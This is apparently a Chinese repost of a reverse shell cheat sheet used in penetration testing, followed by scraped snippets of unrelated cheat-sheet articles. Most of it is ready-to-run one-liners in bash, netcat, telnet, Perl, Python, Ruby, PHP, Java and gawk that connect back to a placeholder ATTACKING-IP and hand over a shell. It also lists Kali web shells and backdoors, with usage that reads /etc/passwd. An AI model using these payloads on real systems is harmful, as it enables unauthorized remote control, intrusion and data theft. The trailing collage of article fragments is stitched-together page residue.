Reverse Shell Cheat Sheet

使用Netcat本地监听一个允许的合法端口，如80/443

[email protected]:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...

注：如果你正在攻击反弹的机器在NAT路由网络里面，那么你需要开启端口转发才能访问到那个网络，比如metasplioit里面的port_forward模块

Bash Reverse Shells

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done  

# or:

while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

php -r ‘$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");‘(Assumes TCP uses file descriptor 3. If it doesn‘t work, try 4,5, or 6)

Netcat Reverse Shell

nc -e /bin/sh ATTACKING-IP 80

/bin/sh | nc ATTACKING-IP 80

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl Reverse Shell

perl -e ‘use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};‘

Perl Windows Reverse Shell

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;‘

perl -e ‘use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};‘

Ruby Reverse Shell

ruby -rsocket -e‘f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)‘

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);‘

Gawk Reverse Shell

#!/usr/bin/gawk -fBEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }}

Kali Web Shells

Kali PHP Web Shells

/usr/share/webshells/php/php-reverse-shell.php	Pen Test Monkey - PHP Reverse Shell
/usr/share/webshells/php/php-findsock-shell.php /usr/share/webshells/php/findsock.c	Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80
/usr/share/webshells/php/simple-backdoor.php	PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple- backdoor.php?cmd=cat+/etc/passwd
/usr/share/webshells/php/php-backdoor.php	Larger PHP shell, with a text input box for command execution.

Kali Perl Reverse Shell

/usr/share/webshells/perl/perl-reverse-shell.pl

Pen Test Monkey - Perl Reverse Shell

/usr/share/webshells/perl/perlcmd.cgi

Pen Test Monkey, Perl Shell.

Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

/usr/share/webshells/cfm/cfexec.cfm

Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usr/share/webshells/asp/

Kali ASP Shells

Kali ASPX Shells

/usr/share/webshells/aspx/

Kali ASPX Shells

Kali JSP Reverse Shell

/usr/share/webshells/jsp/jsp-reverse.jsp

Kali JSP Reverse Shell

原文链接地址：https://highon.coffee/blog/reverse-shell-cheat-sheet/

其他的一些关于转发反弹总结的文章：

渗透测试:反弹与转发小结 - Reverse Shell During the Penetration Test： http://le4f.net/post/post/reverse-shell-during-the-penetration-test

两位博主的博客上还有一些不错的东西，能够多读读有益无害。

时间： 2025-01-03 00:33:32

Reverse Shell Cheat Sheet的相关文章

IOS Application Security Testing Cheat Sheet

IOS Application Security Testing Cheat Sheet [hide] 1 DRAFT CHEAT SHEET - WORK IN PROGRESS 2 Introduction 3 Information gathering 4 Application traffic analysis 5 Runtime analysis 6 Insecure data storage 7 Tools 8 Related Articles 9 Authors and Prima

XSS Filter Evasion Cheat Sheet 中文版【转】

译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常的价值.但是这么著名的一个备忘录却一直没有人把它翻译成中文版.很多人仅仅是简单的把文中的各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了.原因是这篇文章最精华的部分是代码的解释而非代码本身. 一方面为了自己学习,一方面也想让更多国内的xss爱好者去更方便的阅读本文.所以虽然我本身英语很烂,xss技术也很烂,但还是去翻译了这篇文章.当然这也导致最后翻译出来的文章晦涩难懂.不知所云.这

XSS Filter Evasion Cheat Sheet 中文版

前言译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值.但是这么著名的一个备忘录却一直没有人把它翻译成中文版.很多人仅仅是简单的把文中的各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了.原因是这篇文章最精华的部分是代码的解释而非代码本身. 一方面为了自己学习,一方面也想让更多国内的xss爱好者去更方便的阅读本文.所以虽然我本身英语很烂,xss技术也很烂,但还是去翻译了这篇文章.当然这也导致最后翻译出来的文章晦涩难懂.

MySQL SQL Injection Cheat Sheet

MySQL SQL Injection Cheat Sheet Some useful syntax reminders for SQL Injection into MySQL databases- This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endevoured to tabulate the data to make it easier to read and to u

XSS (Cross Site Scripting) Prevention Cheat Sheet(XSS防护检查单)

本文是 XSS防御检查单的翻译版本 https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet 介绍本文描述了一种恰当地使用输出转码或者转义(encoding or escaping)防御XSS攻击的简单积极模式. 尽管存在巨量XSS攻击方式,遵守一些简单的规则能够彻底防住这类严重的攻击. 本文不探讨XSS攻击的商业和技术影响. reflected and stored XSS 可以

转：PostgreSQL Cheat Sheet

PostgreSQL Cheat Sheet CREATE DATABASE CREATE DATABASE dbName; CREATE TABLE (with auto numbering integer id) CREATE TABLE tableName ( id serial PRIMARY KEY, name varchar(50) UNIQUE NOT NULL, dateCreated timestamp DEFAULT current_timestamp ); Add a pr

MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

catalogue 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution. Relevant Link: https://cxsecurity.com/issue/WLB-20151

A printf format reference page (cheat sheet)

Summary: This page is a printf formatting cheat sheet. I originally created this cheat sheet for my own purposes, and then thought I would share it here. A cool thing about the printf formatting syntax is that the specifiers you can use are very simi

The iOS Design Cheat Sheet 界面设计速参

http://ivomynttinen.com/blog/the-ios-7-design-cheat-sheet/ With the release of iOS 7, app designers and developers will need to adjust their visual language to match the new "flat" design of iOS. In addition to the grid system, the dimensions of